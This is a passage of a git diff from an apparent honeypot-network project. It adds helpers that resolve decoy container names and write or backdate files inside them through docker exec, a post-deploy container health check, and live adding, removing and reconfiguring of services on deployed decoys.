+ +Keeping resolution centralised here means new ``docker exec`` callers +(file drops, future bulk planters, etc.) never need to learn the +naming conventions — they just call :func:`resolve_decky_container`. +""" +from __future__ import annotations + +from typing import Any, Iterable, Optional + +_SSH_CONTAINER_SUFFIX = "-ssh" + + +def resolve_topology_container( + topology_id: str, decky_name: str, services: Iterable[str], +) -> str: + """Container name for a MazeNET decky. + + See module docstring for the convention. Pure function — no I/O. + """ + if "ssh" in set(services): + return f"{decky_name}{_SSH_CONTAINER_SUFFIX}" + return f"decnet_t_{topology_id[:8]}_{decky_name}" + + +async def resolve_decky_container( + repo: Any, + decky_name: str, + *, + topology_id: Optional[str] = None, +) -> str: + """Resolve the docker container name for *decky_name*. + + Fleet path (``topology_id is None``): returns ``-ssh`` + unconditionally. No DB lookup — the caller is responsible for + knowing the decky exists; if it doesn't, the subsequent + ``docker exec`` returns a clear error. + + Topology path: hydrates the topology, looks up the decky's services + list, delegates to :func:`resolve_topology_container`. + + Raises: + LookupError — when ``topology_id`` is set but the topology or + its named decky doesn't exist. Callers translate this into + 404/422 at the API layer. 
+ """ + if topology_id is None: + return f"{decky_name}{_SSH_CONTAINER_SUFFIX}" + + from decnet.topology.persistence import hydrate + hydrated = await hydrate(repo, topology_id) + if hydrated is None: + raise LookupError(f"topology {topology_id!r} not found") + for decky in hydrated["deckies"]: + cfg = decky.get("decky_config") or {} + name = cfg.get("name") or decky.get("name") + if name == decky_name: + services = decky.get("services") or [] + return resolve_topology_container(topology_id, decky_name, services) + raise LookupError( + f"decky {decky_name!r} is not in topology {topology_id!r}" + ) diff --git a/decnet/decky_io/write.py b/decnet/decky_io/write.py new file mode 100644 index 00000000..ff89e828 --- /dev/null +++ b/decnet/decky_io/write.py @@ -0,0 +1,124 @@ +"""``docker exec``-driven file write/delete inside a decky container. + +The write path streams a base64-encoded payload over stdin to +``base64 -d`` inside the container, so binary content of any size up +to docker's stream limits is safe — interpolating bytes into argv +would trip ARG_MAX (~128 KB on most kernels) for any non-trivial blob. 
+""" +from __future__ import annotations + +import asyncio +import base64 +import shlex +from datetime import datetime, timezone +from typing import Optional + +from decnet.logging import get_logger + +log = get_logger("decky_io.write") + +_DOCKER = "docker" +_DEFAULT_TIMEOUT = 8.0 + + +def _dirname(path: str) -> str: + idx = path.rfind("/") + if idx <= 0: + return "/" + return path[:idx] + + +async def _run( + argv: list[str], + *, + stdin_bytes: Optional[bytes] = None, + timeout: float = _DEFAULT_TIMEOUT, +) -> tuple[int, str, str]: + try: + proc = await asyncio.create_subprocess_exec( + *argv, + stdin=asyncio.subprocess.PIPE if stdin_bytes is not None else None, + stdout=asyncio.subprocess.PIPE, + stderr=asyncio.subprocess.PIPE, + ) + except FileNotFoundError as exc: + return 127, "", f"argv[0] not found: {exc}" + try: + stdout, stderr = await asyncio.wait_for( + proc.communicate(input=stdin_bytes), timeout=timeout, + ) + except asyncio.TimeoutError: + try: + proc.kill() + except ProcessLookupError: + pass + return 124, "", "timeout" + return ( + proc.returncode if proc.returncode is not None else -1, + stdout.decode("utf-8", "replace"), + stderr.decode("utf-8", "replace"), + ) + + +async def write_file_to_container( + container: str, + path: str, + content: bytes, + *, + mode: int = 0o644, + mtime: Optional[datetime] = None, + timeout: float = _DEFAULT_TIMEOUT, +) -> tuple[bool, Optional[str]]: + """Write *content* to *path* inside *container* via ``docker exec``. + + The directory above *path* is created if missing; *mode* is applied + after the write; when *mtime* is provided the file is backdated via + ``touch -d`` (converted to UTC, formatted ``YYYY-MM-DD HH:MM:SS UTC``). + + Returns ``(success, error_or_none)``. ``error`` is the trimmed + docker stderr (first 256 characters) on rc != 0, or a short "rc={rc}" if stderr was empty. 
+ """ + if not path: + return False, "empty path" + + encoded = base64.b64encode(content) + parts = [ + f"mkdir -p {shlex.quote(_dirname(path))}", + f"base64 -d > {shlex.quote(path)}", + f"chmod {mode:o} {shlex.quote(path)}", + ] + if mtime is not None: + ts = mtime.astimezone(timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC") + parts.append(f"touch -d {shlex.quote(ts)} {shlex.quote(path)}") + sh_cmd = " && ".join(parts) + argv = [_DOCKER, "exec", "-i", container, "sh", "-c", sh_cmd] + rc, _stdout, stderr = await _run(argv, stdin_bytes=encoded, timeout=timeout) + success = rc == 0 + if success: + return True, None + err = stderr.strip()[:256] or f"rc={rc}" + log.warning( + "decky_io.write failed container=%s path=%s rc=%d stderr=%r", + container, path, rc, stderr[:120], + ) + return False, err + + +async def delete_file_from_container( + container: str, + path: str, + *, + timeout: float = _DEFAULT_TIMEOUT, +) -> tuple[bool, Optional[str]]: + """Best-effort ``rm -f`` of *path* inside *container*. + + Returns ``(success, error_or_none)``. ``rm -f`` returns rc=0 even + when the file is already gone, so a True result here means "the + file is not present after this call", regardless of who unlinked it. + """ + sh_cmd = f"rm -f {shlex.quote(path)}" + argv = [_DOCKER, "exec", container, "sh", "-c", sh_cmd] + rc, _stdout, stderr = await _run(argv, timeout=timeout) + if rc == 0: + return True, None + return False, stderr.strip()[:256] or f"rc={rc}" diff --git a/decnet/engine/deployer.py b/decnet/engine/deployer.py index 141e0293..276d2f06 100644 --- a/decnet/engine/deployer.py +++ b/decnet/engine/deployer.py @@ -3,6 +3,7 @@ Deploy, teardown, and status via Docker SDK + subprocess docker compose. 
""" import asyncio +import json import shutil import subprocess # nosec B404 import time @@ -163,6 +164,48 @@ def _sync_sessrec_sources(config: DecnetConfig) -> None: shutil.copy2(src, dest) +def _compose_ps(compose_file: Path) -> list[dict[str, object]]: + """Return ``docker compose ps`` rows for *compose_file* as parsed JSON. + + Used for post-deploy verification: ``compose up -d`` returns 0 the + moment containers are *started*, but a service that crashes on boot + (port collision, bad image, missing dependency) only shows up here. + Returns an empty list when compose has nothing to report (and on + parse failure — caller treats that as 'unverifiable, don't gate'). + """ + cmd = [ + "docker", "compose", "-p", "decnet", "-f", str(compose_file), + "ps", "--all", "--format", "json", + ] + try: + result = subprocess.run( # nosec B603 + cmd, capture_output=True, text=True, check=False, + ) + except FileNotFoundError: + return [] + if result.returncode != 0: + return [] + rows: list[dict[str, object]] = [] + # ``docker compose ps --format json`` emits one JSON object per line + # (newline-delimited), not a JSON array. Parse line-by-line so a + # single bad line doesn't poison the whole result. + for line in (result.stdout or "").splitlines(): + line = line.strip() + if not line: + continue + try: + obj = json.loads(line) + except json.JSONDecodeError: + continue + if isinstance(obj, dict): + rows.append(obj) + elif isinstance(obj, list): + for item in obj: + if isinstance(item, dict): + rows.append(item) + return rows + + def _compose(*args: str, compose_file: Path = COMPOSE_FILE, env: dict | None = None) -> None: import os # -p decnet pins the compose project name. 
Without it, docker compose @@ -953,8 +996,84 @@ async def deploy_topology(repo, topology_id: str, *, dry_run: bool = False) -> N ) raise - await transition_status(repo, topology_id, TopologyStatus.ACTIVE) - log.info("topology %s deployed n_lans=%d", topology_id, len(lans)) + # Post-deploy verification: ``compose up -d`` returns 0 the moment + # containers are *started*, so a service that crashes on boot + # (port bind failure, bad image, missing dependency) leaves the + # topology row sitting at ACTIVE while half the substrate is dead. + # Sample compose ps once and downgrade to DEGRADED if any expected + # container isn't running — operators see real state instead of an + # optimistic flag. + ps_rows = await anyio.to_thread.run_sync( + lambda: _compose_ps(compose_path), + ) + bad: list[str] = [] + # Build the per-decky state map. The base container's compose + # service name == decky name, which is what we cache on the + # TopologyDecky row. Service containers (named ``{decky_name}-{service_name}``) + # don't gate the decky's state — service-level failures are visible + # in compose ps separately and don't downgrade the decky as a whole. + decky_state_by_name: dict[str, str] = {} + for row in ps_rows: + state = str(row.get("State", "")).lower() + service_name = str(row.get("Service") or "") + if service_name and "-" not in service_name: + # Plain decky base; cache its docker state. + decky_state_by_name[service_name] = state or "unknown" + if state and state != "running": + name = str(row.get("Name") or row.get("Service") or "?") + exit_code = row.get("ExitCode") + bad.append( + f"{name}={state}" + + (f" (exit={exit_code})" if exit_code not in (None, 0, "") else "") + ) + + # Reconcile each TopologyDecky.state from compose's view. Without + # this, the row stays at the default 'pending' forever and the + # dashboard's ACTIVE DECKIES count reads 0/N even when everything's + # actually up. 
+ for decky in hydrated["deckies"]: + cfg = decky.get("decky_config") or {} + decky_name = cfg.get("name") or decky.get("name") + if not decky_name: + continue + ds = decky_state_by_name.get(decky_name, "unknown") + new_state = "running" if ds == "running" else "failed" + try: + await repo.update_topology_decky( + decky["uuid"], {"state": new_state}, + ) + except Exception as exc: # noqa: BLE001 + log.warning( + "post-deploy state reconcile failed topology=%s decky=%s: %s", + topology_id, decky_name, exc, + ) + + if bad: + reason = "post-deploy check: " + ", ".join(bad[:8]) + ( + f" and {len(bad) - 8} more" if len(bad) > 8 else "" + ) + await transition_status( + repo, topology_id, TopologyStatus.DEGRADED, reason=reason, + ) + log.warning( + "topology %s deployed but %d container(s) unhealthy: %s", + topology_id, len(bad), reason, + ) + else: + await transition_status(repo, topology_id, TopologyStatus.ACTIVE) + log.info("topology %s deployed n_lans=%d", topology_id, len(lans)) + + # Best-effort canary baseline seed across every decky in the + # topology. Same resilience contract as the fleet path: failures + # surface as state=failed token rows, never abort the deploy. + try: + from decnet.canary import planter as _canary_planter + await _canary_planter.seed_baseline_topology(repo, topology_id) + except Exception as exc: # noqa: BLE001 + log.warning( + "canary baseline seed failed (best-effort) topology=%s err=%s", + topology_id, exc, + ) @_traced("engine.teardown_topology") diff --git a/decnet/engine/services_live.py b/decnet/engine/services_live.py new file mode 100644 index 00000000..cb5dc266 --- /dev/null +++ b/decnet/engine/services_live.py @@ -0,0 +1,673 @@ +"""Add/remove a single service on a deployed decky without full redeploy. + +The ``_compose()`` wrapper in :mod:`decnet.engine.deployer` already +supports per-service targeting (``up --no-deps -d {service}``, +``stop {service}``, ``rm -f {service}``). 
What was missing was the +orchestration: regenerate the compose file (so future redeploys reflect +the change), persist the new ``services`` list, and run the targeted +compose command. + +Two scopes: + +* **Topology** — source of truth is the ``topology_deckies`` table; the + compose file is per-topology (``decnet-topology-{id}-compose.yml``). +* **Fleet** — source of truth is ``decnet-state.json`` (with the + ``fleet_deckies`` table mirroring it); compose is the unihost + ``decnet-compose.yml``. + +Both publish ``decky.{name}.service.added`` / +``decky.{name}.service.removed`` on the bus. The new topic constants +are documented in ``wiki-checkout/Service-Bus.md``. +""" +from __future__ import annotations + +import subprocess # nosec B404 +from pathlib import Path +from typing import Any, Literal, Optional + +import anyio + +from decnet.bus import topics +from decnet.logging import get_logger +from decnet.services.base import BaseService +from decnet.services.registry import get_service +from decnet.topology.persistence import hydrate +from decnet.web.db.repository import BaseRepository + +# Heavy imports (composer/deployer pull in decnet.network → docker) are +# deferred to call-sites via the ``_compose`` / ``_topology_compose_path`` +# / ``_load_state`` indirection helpers below. Mirrors the lazy-import +# pattern in decnet.canary.planter for the same reason. + + +def _compose(*args: str, compose_file: Optional[Path] = None, env=None) -> None: + """Indirection so tests can ``monkeypatch.setattr(services_live, '_compose', ...)``. + + Real implementation lives in :mod:`decnet.engine.deployer`; we + import-and-delegate at call time to keep this module's import graph + clean (see the "Heavy imports" comment above). 
+ """ + from decnet.engine.deployer import _compose as _real_compose + if compose_file is None: + _real_compose(*args, env=env) + else: + _real_compose(*args, compose_file=compose_file, env=env) + + +def _topology_compose_path(topology_id: str) -> Path: + from decnet.engine.deployer import _topology_compose_path as _real_path + return _real_path(topology_id) + + +def _write_topology_compose(hydrated, path: Path) -> Path: + from decnet.topology.compose import write_topology_compose + return write_topology_compose(hydrated, path) + + +def _load_state(): + from decnet.config import load_state as _real_load_state + return _real_load_state() + + +def _save_state(config, compose_path) -> None: + from decnet.config import save_state as _real_save_state + _real_save_state(config, compose_path) + + +def _write_compose(config, compose_path) -> None: + from decnet.composer import write_compose as _real_write_compose + _real_write_compose(config, compose_path) + + +def _get_bus(): + from decnet.bus.factory import get_bus + return get_bus() + + +# --------------------------- swarm propagation helpers --------------------------- +# +# Service mutations (add/remove/update_config) on a deployed decky used to run +# the master's local docker-compose only. For swarm fleet deckies the master +# has no containers; for agent-targeted topologies the master only writes a +# compose file the worker never sees. These helpers replay the change to the +# worker so the env actually lands. +# +# Lazy imports keep this module's import graph clean (composer/swarm pull in +# decnet.network → docker, mirroring the pattern used elsewhere in this file). 
+ + +async def _fleet_decky_host_uuid(repo: BaseRepository, decky_name: str) -> Optional[str]: + """Return ``host_uuid`` if a fleet decky lives on a swarm worker, else None.""" + shards = await repo.list_decky_shards() + for s in shards: + if s.get("decky_name") == decky_name: + return s.get("host_uuid") + return None + + +async def _redispatch_fleet_shard(repo: BaseRepository, host_uuid: str) -> None: + """Re-push the host's full shard to its worker agent. + + Uses the same code path as POST /swarm/deploy: load master state, filter + to the host's deckies, hand to AgentClient.deploy via dispatch_decnet_config. + The agent regenerates compose and recreates only the changed containers. + Idempotent for unchanged deckies. + """ + from decnet.web.router.swarm.api_deploy_swarm import dispatch_decnet_config + + state = _load_state() + if state is None: + log.warning("redispatch_fleet_shard: no fleet state on master; skipping") + return + config, _compose_path = state + host_deckies = [d for d in config.deckies if getattr(d, "host_uuid", None) == host_uuid] + if not host_deckies: + log.warning( + "redispatch_fleet_shard: master state has no deckies for host=%s; skipping", + host_uuid, + ) + return + filtered = config.model_copy(update={"deckies": host_deckies}) + await dispatch_decnet_config(filtered, repo) + + +async def _resync_agent_topology(repo: BaseRepository, topology_id: str) -> None: + """If the topology is agent-pinned, push the latest hydrated blob to the worker.""" + from decnet.engine.deployer import resync_agent_topology + + hydrated = await hydrate(repo, topology_id) + if hydrated is None: + return + if not hydrated.get("topology", {}).get("target_host_uuid"): + return # unihost topology — local compose is authoritative + await resync_agent_topology(repo, topology_id) + + +log = get_logger("engine.services_live") + +DeckyKind = Literal["fleet", "topology"] + + +class ServiceMutationError(ValueError): + """Raised for caller-correctable failures. 
The API layer dispatches on + subclass to produce 4xx codes; base class maps to 422. + """ + + +class ServiceNotFoundError(ServiceMutationError): + """Decky or topology does not exist → 404.""" + + +class ServiceConflictError(ServiceMutationError): + """Idempotency violation (already on / not on) → 409.""" + + +def _validate_service_for_per_decky(name: str) -> BaseService: + """Return the registered service or raise ``ServiceMutationError``. + + ``fleet_singleton`` services run once per fleet (e.g. an LLMNR + responder), not per-decky — we reject the per-decky add/remove + request rather than silently producing a no-op compose entry. + """ + try: + svc = get_service(name) + except KeyError as exc: + raise ServiceMutationError(f"unknown service {name!r}") from exc + if svc.fleet_singleton: + raise ServiceMutationError( + f"service {name!r} is fleet_singleton; not addable per-decky" + ) + return svc + + +async def _publish(topic: str, payload: dict[str, Any]) -> None: + """Best-effort bus publish — same shape as the canary planter's helper.""" + try: + bus = _get_bus() + await bus.connect() + await bus.publish(topic, payload) + await bus.close() + except Exception as e: # noqa: BLE001 + log.warning("services_live bus publish failed topic=%s err=%s", topic, e) + + +# ---------------------------------------------------------- topology path + + +async def _topology_decky( + repo: BaseRepository, topology_id: str, decky_name: str, +) -> dict[str, Any]: + hydrated = await hydrate(repo, topology_id) + if hydrated is None: + raise ServiceNotFoundError(f"topology {topology_id!r} not found") + for d in hydrated["deckies"]: + cfg = d.get("decky_config") or {} + name = cfg.get("name") or d.get("name") + if name == decky_name: + return d + raise ServiceNotFoundError( + f"decky {decky_name!r} is not in topology {topology_id!r}" + ) + + +async def _rerender_topology_compose( + repo: BaseRepository, topology_id: str, +) -> Path: + """Re-hydrate + re-render the per-topology compose 
file. + + Called after a successful DB update so future deploys reflect the + change; without this the file would still describe the old service + set and a subsequent ``up -d`` would resurrect the removed service. + """ + hydrated = await hydrate(repo, topology_id) + if hydrated is None: # pragma: no cover — narrow race + raise ServiceNotFoundError( + f"topology {topology_id!r} disappeared mid-mutation" + ) + path = _topology_compose_path(topology_id) + _write_topology_compose(hydrated, path) + return path + + +async def _add_topology_service( + repo: BaseRepository, + topology_id: str, + decky_name: str, + service_name: str, + initial_config: dict | None = None, +) -> list[str]: + decky = await _topology_decky(repo, topology_id, decky_name) + services: list[str] = list(decky.get("services") or []) + if service_name in services: + raise ServiceConflictError( + f"service {service_name!r} already on decky {decky_name!r}" + ) + services.append(service_name) + update: dict[str, Any] = {"services": services} + # If the caller supplied initial config, fold it into decky_config + # BEFORE compose regen so the first ``up`` materialises the env on + # the new container — no follow-up apply needed. + if initial_config: + cfg_blob = dict(decky.get("decky_config") or {}) + sc = dict(cfg_blob.get("service_config") or {}) + sc[service_name] = initial_config + cfg_blob["service_config"] = sc + update["decky_config"] = cfg_blob + await repo.update_topology_decky(decky["uuid"], update) + + compose_path = await _rerender_topology_compose(repo, topology_id) + if await _topology_is_agent_pinned(repo, topology_id): + # Agent-pinned: the master's local compose has nothing to up. + # Push the new hydrated blob to the worker. + await _resync_agent_topology(repo, topology_id) + else: + target = f"{decky_name}-{service_name}" + # Run compose in a worker thread so the API event loop stays + # responsive — same pattern as engine/deployer.deploy_topology. 
+ await anyio.to_thread.run_sync( + lambda: _compose( + "up", "-d", "--no-deps", "--build", target, + compose_file=compose_path, + ), + ) + return services + + +async def _topology_is_agent_pinned(repo: BaseRepository, topology_id: str) -> bool: + hydrated = await hydrate(repo, topology_id) + if hydrated is None: + return False + return bool(hydrated.get("topology", {}).get("target_host_uuid")) + + +async def _remove_topology_service( + repo: BaseRepository, + topology_id: str, + decky_name: str, + service_name: str, +) -> list[str]: + decky = await _topology_decky(repo, topology_id, decky_name) + services: list[str] = list(decky.get("services") or []) + if service_name not in services: + raise ServiceConflictError( + f"service {service_name!r} not on decky {decky_name!r}" + ) + services = [s for s in services if s != service_name] + target = f"{decky_name}-{service_name}" + compose_path = _topology_compose_path(topology_id) + agent_pinned = await _topology_is_agent_pinned(repo, topology_id) + if not agent_pinned: + # Stop + rm before persisting + re-rendering so a half-completed + # mutation leaves the operator a clear state to retry from + # (container still running; DB still says service is on). + await anyio.to_thread.run_sync( + lambda: _compose("stop", target, compose_file=compose_path), + ) + await anyio.to_thread.run_sync( + lambda: _compose("rm", "-f", target, compose_file=compose_path), + ) + await repo.update_topology_decky(decky["uuid"], {"services": services}) + await _rerender_topology_compose(repo, topology_id) + if agent_pinned: + # Worker tears down the removed service when it diffs the + # incoming hydrated blob against its current state. 
+ await _resync_agent_topology(repo, topology_id) + return services + + +# ---------------------------------------------------------- fleet path + + +def _fleet_state_or_raise() -> tuple[Any, Path]: + state = _load_state() + if state is None: + raise ServiceMutationError( + "no fleet state on disk — run `decnet up` first" + ) + return state + + +def _fleet_find_decky(config: Any, decky_name: str) -> Any: + for d in config.deckies: + if d.name == decky_name: + return d + raise ServiceNotFoundError(f"fleet decky {decky_name!r} not found") + + +async def _persist_fleet_change( + repo: BaseRepository, decky: Any, services: list[str], compose_path: Path, +) -> None: + """Persist the mutation to JSON state, compose file, and the DB row.""" + config, _ = _load_state() + target = _fleet_find_decky(config, decky.name) + target.services = services + _save_state(config, compose_path) + _write_compose(config, compose_path) + # Mirror to the DB row so DB-only consumers (dashboard, API) see the + # change without waiting for the reconciler. + from decnet.web.db.models import LOCAL_HOST_SENTINEL + await repo.upsert_fleet_decky({ + "host_uuid": getattr(decky, "host_uuid", None) or LOCAL_HOST_SENTINEL, + "name": decky.name, + "services": services, + "decky_config": target.model_dump(mode="json"), + "decky_ip": decky.ip, + "state": "running", + }) + + +async def _add_fleet_service( + repo: BaseRepository, + decky_name: str, + service_name: str, + initial_config: dict | None = None, +) -> list[str]: + config, compose_path = _fleet_state_or_raise() + decky = _fleet_find_decky(config, decky_name) + services: list[str] = list(decky.services or []) + if service_name in services: + raise ServiceConflictError( + f"service {service_name!r} already on decky {decky_name!r}" + ) + services.append(service_name) + if initial_config: + # Same path as _update_fleet_service_config: stash the validated + # cfg on the decky model so the compose write picks it up. 
+ sc = dict(getattr(decky, "service_config", None) or {}) + sc[service_name] = initial_config + decky.service_config = sc + await _persist_fleet_change(repo, decky, services, compose_path) + swarm_host_uuid = await _fleet_decky_host_uuid(repo, decky_name) + if swarm_host_uuid: + # Master has no container for this decky — re-push the host's + # shard so the worker materialises the new service. + await _redispatch_fleet_shard(repo, swarm_host_uuid) + else: + target = f"{decky_name}-{service_name}" + await anyio.to_thread.run_sync( + lambda: _compose( + "up", "-d", "--no-deps", "--build", target, + compose_file=compose_path, + ), + ) + return services + + +async def _remove_fleet_service( + repo: BaseRepository, decky_name: str, service_name: str, +) -> list[str]: + config, compose_path = _fleet_state_or_raise() + decky = _fleet_find_decky(config, decky_name) + services: list[str] = list(decky.services or []) + if service_name not in services: + raise ServiceConflictError( + f"service {service_name!r} not on decky {decky_name!r}" + ) + services = [s for s in services if s != service_name] + target = f"{decky_name}-{service_name}" + swarm_host_uuid = await _fleet_decky_host_uuid(repo, decky_name) + if not swarm_host_uuid: + # Local: stop+rm before persist so the operator has a clear retry + # state if compose fails halfway. Swarm: skip — the worker's compose + # will handle the removal when the redispatched config drops the + # service from the decky. 
+ await anyio.to_thread.run_sync( + lambda: _compose("stop", target, compose_file=compose_path), + ) + await anyio.to_thread.run_sync( + lambda: _compose("rm", "-f", target, compose_file=compose_path), + ) + await _persist_fleet_change(repo, decky, services, compose_path) + if swarm_host_uuid: + await _redispatch_fleet_shard(repo, swarm_host_uuid) + return services + + +# ---------------------------------------------------------- public api + + +async def add_service( + repo: BaseRepository, + *, + decky_kind: DeckyKind, + decky_name: str, + service_name: str, + topology_id: Optional[str] = None, + config: dict | None = None, +) -> list[str]: + """Add *service_name* to a deployed decky. + + Validates the service registry (rejects unknown / fleet_singleton + names) and the optional ``config`` against the service's schema, + persists the change, regenerates the compose file, runs + ``up -d --no-deps --build {decky_name}-{service_name}`` in a worker thread, + and publishes ``decky.{name}.service.added`` on the bus. + + ``config`` is the same dict shape PUT/POST .../config accepts; it's + coerced via ``BaseService.validate_cfg`` before any state write so + a 400-class failure leaves zero side-effects. + + Returns the post-mutation services list. 
+ """ + svc = _validate_service_for_per_decky(service_name) + initial_config = svc.validate_cfg(config) if config else {} + if decky_kind == "topology": + if not topology_id: + raise ServiceMutationError( + "decky_kind=topology requires topology_id", + ) + services = await _add_topology_service( + repo, topology_id, decky_name, service_name, + initial_config=initial_config, + ) + elif decky_kind == "fleet": + services = await _add_fleet_service( + repo, decky_name, service_name, + initial_config=initial_config, + ) + else: # pragma: no cover — Literal narrows + raise ServiceMutationError(f"unknown decky_kind {decky_kind!r}") + + await _publish( + topics.decky(decky_name, topics.DECKY_SERVICE_ADDED), + { + "decky_name": decky_name, + "service_name": service_name, + "topology_id": topology_id, + "services": services, + }, + ) + log.info( + "services_live.add decky=%s topology=%s service=%s", + decky_name, topology_id, service_name, + ) + return services + + +async def update_service_config( + repo: BaseRepository, + *, + decky_kind: DeckyKind, + decky_name: str, + service_name: str, + cfg: dict, + apply: bool = False, + topology_id: Optional[str] = None, +) -> dict: + """Persist ``cfg`` as the new ``service_config[service_name]`` for a decky. + + The submitted dict is validated against the service's + ``config_schema`` (unknown keys dropped, types coerced) BEFORE any + DB write, so a 400-class failure leaves zero side-effects. + + ``apply=False`` (Save): only the DB row + compose file are updated. + The running container keeps its old env. + ``apply=True`` (Apply): same persistence, then a force-recreate of + ``{decky_name}-{service_name}`` so the container picks + up the new env. Destructive: drops any + in-container session state on that service. + + Returns the post-mutation validated cfg. 
+ """ + svc = _validate_service_for_per_decky(service_name) + validated = svc.validate_cfg(cfg) + if decky_kind == "topology": + if not topology_id: + raise ServiceMutationError( + "decky_kind=topology requires topology_id", + ) + await _update_topology_service_config( + repo, topology_id, decky_name, service_name, validated, apply=apply, + ) + elif decky_kind == "fleet": + await _update_fleet_service_config( + repo, decky_name, service_name, validated, apply=apply, + ) + else: # pragma: no cover + raise ServiceMutationError(f"unknown decky_kind {decky_kind!r}") + + await _publish( + topics.decky(decky_name, topics.DECKY_SERVICE_CONFIG_CHANGED), + { + "decky_name": decky_name, + "service_name": service_name, + "topology_id": topology_id, + "service_config": validated, + "recreated": bool(apply), + }, + ) + log.info( + "services_live.update_config decky=%s topology=%s service=%s apply=%s", + decky_name, topology_id, service_name, apply, + ) + return validated + + +async def _update_topology_service_config( + repo: BaseRepository, + topology_id: str, + decky_name: str, + service_name: str, + validated: dict, + *, + apply: bool, +) -> None: + decky = await _topology_decky(repo, topology_id, decky_name) + if service_name not in (decky.get("services") or []): + raise ServiceConflictError( + f"service {service_name!r} not on decky {decky_name!r}" + ) + cfg_blob = dict(decky.get("decky_config") or {}) + sc = dict(cfg_blob.get("service_config") or {}) + sc[service_name] = validated + cfg_blob["service_config"] = sc + await repo.update_topology_decky(decky["uuid"], {"decky_config": cfg_blob}) + compose_path = await _rerender_topology_compose(repo, topology_id) + if apply: + if await _topology_is_agent_pinned(repo, topology_id): + await _resync_agent_topology(repo, topology_id) + else: + target = f"{decky_name}-{service_name}" + await anyio.to_thread.run_sync( + lambda: _compose( + "up", "-d", "--no-deps", "--force-recreate", "--build", target, + compose_file=compose_path, + 
), + ) + + +async def _update_fleet_service_config( + repo: BaseRepository, + decky_name: str, + service_name: str, + validated: dict, + *, + apply: bool, +) -> None: + config, compose_path = _fleet_state_or_raise() + decky = _fleet_find_decky(config, decky_name) + if service_name not in (decky.services or []): + raise ServiceConflictError( + f"service {service_name!r} not on decky {decky_name!r}" + ) + sc = dict(getattr(decky, "service_config", None) or {}) + sc[service_name] = validated + decky.service_config = sc + _save_state(config, compose_path) + _write_compose(config, compose_path) + from decnet.web.db.models import LOCAL_HOST_SENTINEL + await repo.upsert_fleet_decky({ + "host_uuid": getattr(decky, "host_uuid", None) or LOCAL_HOST_SENTINEL, + "name": decky.name, + "services": list(decky.services or []), + "decky_config": decky.model_dump(mode="json"), + "decky_ip": decky.ip, + "state": "running", + }) + if apply: + swarm_host_uuid = await _fleet_decky_host_uuid(repo, decky_name) + if swarm_host_uuid: + await _redispatch_fleet_shard(repo, swarm_host_uuid) + else: + target = f"{decky_name}-{service_name}" + # Docker Compose tracks the previous container by ID. If that + # container was already removed (or renamed during a prior failed + # deploy), --force-recreate fails with "No such container". Pre- + # remove by name so Compose starts from a clean slate. + await anyio.to_thread.run_sync( + lambda: subprocess.run( # nosec B603 B607 + ["docker", "rm", "-f", target], + capture_output=True, + ), + ) + await anyio.to_thread.run_sync( + lambda: _compose( + "up", "-d", "--no-deps", "--force-recreate", "--build", target, + compose_file=compose_path, + ), + ) + + +async def remove_service( + repo: BaseRepository, + *, + decky_kind: DeckyKind, + decky_name: str, + service_name: str, + topology_id: Optional[str] = None, +) -> list[str]: + """Remove *service_name* from a deployed decky. 
+ + Stops + removes the service container, persists the new services + list, re-renders the compose file (so the next ``up -d`` doesn't + bring it back), and publishes ``decky.{name}.service.removed``. + + Returns the post-mutation services list. + """ + if decky_kind == "topology": + if not topology_id: + raise ServiceMutationError( + "decky_kind=topology requires topology_id", + ) + services = await _remove_topology_service( + repo, topology_id, decky_name, service_name, + ) + elif decky_kind == "fleet": + services = await _remove_fleet_service(repo, decky_name, service_name) + else: # pragma: no cover + raise ServiceMutationError(f"unknown decky_kind {decky_kind!r}") + + await _publish( + topics.decky(decky_name, topics.DECKY_SERVICE_REMOVED), + { + "decky_name": decky_name, + "service_name": service_name, + "topology_id": topology_id, + "services": services, + }, + ) + log.info( + "services_live.remove decky=%s topology=%s service=%s", + decky_name, topology_id, service_name, + ) + return services diff --git a/decnet/env.py b/decnet/env.py index 99b6d285..74718586 100644 --- a/decnet/env.py +++ b/decnet/env.py @@ -114,6 +114,11 @@ DECNET_SWARM_MASTER_HOST: str | None = os.environ.get("DECNET_SWARM_MASTER_HOST" DECNET_HOST_UUID: str | None = os.environ.get("DECNET_HOST_UUID") DECNET_MASTER_HOST: str | None = os.environ.get("DECNET_MASTER_HOST") DECNET_SWARMCTL_PORT: int = _port("DECNET_SWARMCTL_PORT", 8770) +# Bind address for the master-side swarm controller. Loopback by default — +# operators flip to 0.0.0.0 (or a specific NIC) on production masters where +# workers heartbeat in over mTLS from other hosts. Seeded by [swarm] +# swarmctl-host in /etc/decnet/decnet.ini. +DECNET_SWARMCTL_HOST: str = os.environ.get("DECNET_SWARMCTL_HOST", "127.0.0.1") # Ingester batching: how many log rows to accumulate per commit, and the # max wait (ms) before flushing a partial batch. 
Larger batches reduce diff --git a/decnet/geoip/rir/provider.py b/decnet/geoip/rir/provider.py index 87ee53d4..462d78de 100644 --- a/decnet/geoip/rir/provider.py +++ b/decnet/geoip/rir/provider.py @@ -9,7 +9,7 @@ from decnet.geoip.base import Provider from decnet.geoip.lookup import Lookup from decnet.geoip.paths import ensure_root from decnet.geoip.rir.fetch import RIR_SOURCES, fetch_all -from decnet.geoip.rir.parse import parse_file +from decnet.geoip.rir.parse import Range, parse_file logger = logging.getLogger("decnet.geoip.rir.provider") @@ -45,7 +45,7 @@ class RirProvider(Provider): except Exception as exc: logger.warning("geoip.rir: cache load failed, rebuilding: %s", exc) - ranges = [] + ranges: list[Range] = [] for path in self.data_paths(): if not path.exists(): continue diff --git a/decnet/logging/__init__.py b/decnet/logging/__init__.py index 73f61021..3bfbd300 100644 --- a/decnet/logging/__init__.py +++ b/decnet/logging/__init__.py @@ -28,7 +28,7 @@ class _ComponentFilter(logging.Filter): self.component = component def filter(self, record: logging.LogRecord) -> bool: - record.decnet_component = self.component # type: ignore[attr-defined] + record.decnet_component = self.component return True @@ -49,14 +49,14 @@ class _TraceContextFilter(logging.Filter): span = trace.get_current_span() ctx = span.get_span_context() if ctx and ctx.trace_id: - record.otel_trace_id = format(ctx.trace_id, "032x") # type: ignore[attr-defined] - record.otel_span_id = format(ctx.span_id, "016x") # type: ignore[attr-defined] + record.otel_trace_id = format(ctx.trace_id, "032x") + record.otel_span_id = format(ctx.span_id, "016x") else: - record.otel_trace_id = "0" # type: ignore[attr-defined] - record.otel_span_id = "0" # type: ignore[attr-defined] + record.otel_trace_id = "0" + record.otel_span_id = "0" except Exception: - record.otel_trace_id = "0" # type: 